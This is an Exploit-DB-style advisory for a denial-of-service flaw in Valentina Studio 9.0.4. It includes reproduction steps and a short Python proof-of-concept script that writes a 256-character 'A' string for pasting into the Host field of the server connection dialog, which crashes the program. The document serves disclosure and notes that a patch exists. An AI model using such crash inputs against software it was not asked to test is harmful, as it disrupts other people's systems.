Vendor: Valentina Studio
By: Victor Mondragón
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: Valentina Studio
Affected Version From: 9.0.4
Affected Version To: 9.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: valentina-db.com/en/developer/database/download-valentina-database-adk
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64 Service Pack 1
Year: 2018

Valentina Studio 9.0.4 – Denial of Service (PoC)

Valentina Studio 9.0.4 is vulnerable to a denial of service: the application crashes when a string of 256 'A' characters is pasted into the "Host" field of the "File" > "Connect to" > "Valentina Server" dialog. The PoC script below writes that string to valentina.txt, from which it is copied to the clipboard.

Mitigation:

Valentina Studio should be updated to the latest version to mitigate this vulnerability.

Exploit-DB raw data:

#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed

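# Payload: 256 'A' (0x41) characters
cod = "\x41" * 256

# Write the payload to valentina.txt; the file is closed when the block exits
with open('valentina.txt', 'w') as f:
    f.write(cod)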